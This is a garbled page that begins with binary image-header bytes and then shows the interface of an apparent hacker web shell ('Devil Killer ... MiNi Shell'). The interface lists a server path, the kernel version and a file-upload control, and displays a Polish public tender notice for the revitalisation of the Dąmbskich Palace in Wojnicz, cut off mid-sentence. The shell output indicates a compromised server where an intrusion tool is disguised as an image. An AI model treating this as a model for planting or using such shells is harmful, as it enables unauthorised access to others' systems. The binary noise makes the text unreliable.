JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220429/0014188002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rewitalizacja Pałacu Dąmbskich w Wojniczu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wojnicz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660973</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wojnicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wojnicz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wojnicz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Radców Prawnych Anna Studencka Dawid Studencki S.K.A. - Dawid Studencki Pełnomocnik Zamawiającego</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP: 6751760157</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Topolowa 31/1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">31-506</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">przetargi@wojnicz.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">wojnicz.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rewitalizacja Pałacu Dąmbskich w Wojniczu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82d25f18-c7ac-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00141880</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00035812/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Rewitalizacja Pałacu Dąmbskich w Wojniczu – etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/93287ecf-5e42-4dc9-b36c-60b91a4d7f4e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">14.1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w PZP, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>14.3. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej (w zakresie wskazanym poniżej/Adres skrzynki ePUAP Zamawiającego:<br/>/64j5fkh5bq/SkrytkaESP.<br/>14.4. Adres poczty elektronicznej, z którego może komunikować się Zamawiający: przetargi@wojnicz.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać <br/>konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: <br/>14.6.1. „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do <br/>14.6.2. „Formularza do komunikacji”.<br/>14.7. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych <br/>kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały <br/>w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług <br/>administracji publicznej (ePUAP).<br/>14.8. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz <br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>14.9. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub <br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania <br/>na ePUAP. <br/>14.10. Zamawiający przekazuje informacje o postępowaniu oraz ID postępowania w treści niniejszej SWZ. Dane <br/>postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej <br/>opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">szczegółowa klauzula RODO znajduje się w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegółowa klauzula RODO znajduje się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem niniejszego zamówienia publicznego jest Rewitalizacja Pałacu Dąmbskich w Wojniczu<br/>3.2. W zakres zamówienia wchodzą w szczególności następujące zakresy prac:<br/>1) Podbicie fundamentów, izolacja pionowa i pozioma, drenaż<br/>2) Konstrukcje <br/>a) Piwnice<br/>2<br/>b) Parter<br/>c) piętro<br/>d) Poddasze<br/>e) Taras nad pomieszczeniami magazynowymi<br/>f) Taras nad wiatrołapem<br/>3) Elewacja <br/>a) Rusztowania<br/>b) Stolarka okienna<br/>c) Stolarka drzwiowa zewnętrzna<br/>d) Cokół kamienny do konserwacji<br/>e) Cokół do renowacji<br/>f) schody wejściowe<br/>g) Elewacja tynki i profile ciągnione<br/>4) Dach<br/>a) Konstrukcja dachowa <br/>b) Pokrycie dachowe <br/>c) Instalacja odgromowa<br/>5) Centrala wentylacyjna<br/>3.1.	Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określa załącznik nr 1 do SWZ (Dokumentacja projektowa wraz z załącznikami), <br/><br/>Uwaga: Wykonawca winien wziąć pod uwagę dokumentację projektową wyłącznie w zakresie określonym w przedmiarze robót!<br/><br/>3.2.	Uwaga! Budynek Pałacu Dąmbskich wraz z najbliższym otoczeniem wpisany został do Rejestru zabytków pod numerem A-308 w 1971 r., pozostała część parku (obejmująca dz. nr 1665/24 <br/>o pow. 7,7 ha) wpisana została do Rejestru pod nr. A -19/M w 2004 r., a cały układ przestrzenny Miasta Wojnicza, na terenie którego znajduje się przedmiotowy zespół znajduje się w ww. Rejestrze pod nr. A-132 (1977). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42520000-7 - Urządzenia wentylacyjne</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45452000-0 - Zewnętrzne czyszczenie budynków</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">. Zamawiający przewiduje możliwość udzielania zamówień na podstawie art. 305 pkt 1) w z art. 214 <br/>ust. 1 pkt 7 PZP czyli zamówienia polegającego na powtórzeniu podobnych robót budowlanych na <br/>poziomie do 50 % procent ilości przewidzianych w poszczególnych pozycjach kosztorysów <br/>ofertowych, po przeprowadzeniu stosownego postępowania w tej sprawie.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 11. WARUNKI UDZIAŁU W POSTĘPOWANIU:<br/>11.1. O udzielenie zamówienia może ubiegać się Wykonawca, który:<br/>11.1.1. spełnia warunki dotyczące zdolności do występowania w obrocie gospodarczym – Zamawiający nie <br/>określa warunku;<br/>11.1.2. spełnia warunki dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej – Zamawiający nie określa warunku;<br/>11.1.3. spełnia warunki dotyczące sytuacji ekonomicznej lub finansowej<br/>11.1.3.1.Wykonawca zobowiązany jest wykazać, że: posiada ubezpieczenie od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem <br/>zamówienia na kwotę nie mniejszą niż 1.000.000,00 zł (słownie: jeden milion złotych 00/100);<br/>11.1.3.2. posiada środki finansowe lub zdolność kredytową, na kwotę, co najmniej 2.000.000,00 PLN <br/>(dwa miliony złotych).<br/>7<br/>11.1.4. spełnia warunki dotyczące zdolności technicznej lub zawodowej:<br/>11.1.4.1. dysponuje lub będzie dysponować następującymi osobami skierowanymi przez Wykonawcę do <br/>realizacji zamówienia:<br/>11.1.4.1.1.dysponuje co najmniej jedną osobą, która będzie pełnić funkcje kierownika budowy i <br/>która posiada aktualne uprawnienia do kierowania robotami budowalnymi w <br/>specjalności konstrukcyjno-budowlanej bez ograniczeń i spełnia wymagania, o których <br/>mowa w art. 37a i 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad <br/>zabytkami oraz posiada minimum 5-letnie doświadczenie zawodowe – rozumiane jako<br/>pełnienie funkcji kierownika budowy przy pracach na obiektach wpisanych do rejestru <br/>zabytków;<br/>11.1.4.1.2.dysponuje co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót <br/>sanitarnych i posiada aktualne uprawnienia do kierowania robotami budowlanymi bez <br/>ograniczeń w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/>wodociągowych i kanalizacyjnych oraz posiada minimum 3-letnie doświadczenie <br/>zawodowe – rozumiane jako pełnienie funkcji kierownika budowy lub kierownika robót <br/>sanitarnych;<br/>11.1.4.1.3.dysponuje co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót <br/>elektrycznych i posiada aktualne uprawnienia do kierowania robotami budowlanymi<br/>bez ograniczeń w zakresie sieci instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych oraz posiada minimum 3-letnie doświadczenie zawodowe -<br/>rozumiane jako pełnienie funkcji kierownika budowy lub kierownika robót <br/>elektrycznych.<br/>11.1.4.1.4.dysponuje zespołem archeologów składającym się z min. 3 osób, które będą <br/>sprawowały nadzór archeologiczny, spośród których przynamniej jedna spełnia <br/>wymagania, o których mowa w art. 37e ustawy z dnia 23 lipca 2003 r. o ochronie <br/>zabytków i opiece nad zabytkami, z czego co najmniej jedna osoba (tj. ta która będzie <br/>kierować badaniami archeologicznymi) wykaże się doświadczeniem w prowadzeniu<br/>badań archeologicznych przez okres nie krótszy niż 5 lat, a pozostałe osoby wykażą się <br/>doświadczeniem w prowadzeniu badań archeologicznych przez okres nie krótszy niż 2 <br/>lata,;<br/>11.1.4.1.5.dysponuje co najmniej jedną osobą, która będzie pełnić funkcję kierownika prac <br/>konserwatorskich, która:<br/> ukończyła studia wyższe na kierunku konserwacja dzieł sztuki w zakresie <br/>architektury lub rzeźby <br/> posiada minimum 10 lat doświadczenia zawodowego w pracy w charakterze <br/>konserwatora zabytków przy pracach w obiektach zabytkowych, w trakcie <br/>których brał udział w realizacji co najmniej 5 prac polegających na remoncie <br/>konserwatorskim elewacji w obiektach zabytkowych wykonanych <br/>w technologii tynkarskiej; <br/>11.1.4.1.6. dysponuje zespołem tynkarzy min. 4 osoby, z których każda posiada minimum 5 lat <br/>doświadczenia w realizacji prac tynkarskich na obiektach zabytkowych;<br/>11.1.4.1.7.dysponuje co najmniej jedną osobą, która ukończyła studia wyższe na kierunku <br/>konserwatora dzieł sztuki, posiadającą minimum 2 lata doświadczenia zawodowego<br/>przy realizacji prac związanych z rekonstrukcją lub konserwacją detali <br/>architektonicznych w obiekcie zabytkowym.<br/>UWAGA do pkt 11.1.4.1: Zamawiający wymaga, aby te same osoby świadczyły później usługi objęte <br/>przedmiotem zamówienia, z zastrzeżeniem możliwości zmiany tych osób na warunkach określonych <br/>w umowie.<br/>UWAGA do pkt 11.1.4.1: Zamawiający uzna za równoważne uprawnieniom wskazanym powyżej, <br/>uprawnienia tożsame wydane na podstawie wcześniej obowiązujących przepisów, lub równoważne <br/>uprawnieniom do kierowania robotami budowlanymi bez ograniczeń w zakresie w/w, wydane w <br/>innym państwie przy jednoczesnym spełnieniu wymagań określonych w ustawie z dnia 22 grudnia <br/>8<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/>Europejskiej.<br/>11.1.4.2. wykaże się doświadczeniem w realizacji robót budowlanych, przez co zamawiający rozumie:<br/>11.1.4.2.1.w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie - wykonał, co najmniej 2 roboty o <br/>wartości min. 2 000 000 zł brutto każda, które swoim zakresem obejmowały co <br/>najmniej: remont elewacji budynku (tynki wraz z konserwacją elementów <br/>architektonicznych), wykonanie pokrycia dachowego z dachówki ceramicznej wraz z <br/>remontem więźby dachowej, w tym remont/wymiana stolarki okiennej wartość <br/>minimum 150 000,00 zł brutto oraz prace związane z wykonaniem wentylacji w obiekcie <br/>zabytkowym;<br/>11.1.4.2.2.w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie - wykonali, co najmniej 1 robotę o <br/>wartości min. 700 000,00 zł brutto, która swoim zakresem obejmowała prace w zakresie <br/>podbicia fundamentów wraz z wykonaniem pionowej izolacji przeciwwilgociowej <br/>budynku wpisanego do rejestru zabytków.<br/>UWAGA: Za ukończone roboty budowlane Zamawiający uważa roboty, dla których wystawiono <br/>świadectwo przejęcia lub protokół odbioru końcowego lub inny dokument o podobny charakterze. <br/>UWAGA: W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału <br/>w postępowaniu, załączy podmiotowe środki dowodowe zawierające kwoty wyrażone w walutach <br/>innych niż złoty polski, Zamawiający przeliczy je na złoty polski według średnich kursów walut NBP <br/>opublikowanych w dniu, w którym wydano podmiotowy środek dowodowy. W przypadku braku <br/>publikacji kursów walut NBP w dniu, w którym wydano podmiotowy środek dowodowy, Zamawiający <br/>dokona przeliczenia według kursu ostatnio ogłoszonego przed dniem, w którym wydano podmiotowy <br/>środek dowodowy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych <br/>środków dowodowych, aktualnych na dzień składania:<br/>12.2.1. dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/>10<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/>określoną w pkt. 11.1.3.1. SWZ;<br/>12.2.2. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość <br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym <br/>niż 3 miesiące przed jej złożeniem;<br/>12.2.3. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia <br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – w zakresie <br/>potwierdzającym spełnianie warunków, o których mowa w pkt 11.1.4.1. SWZ;<br/>12.2.4. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju wartości, daty <br/>i miejsca wykonania oraz 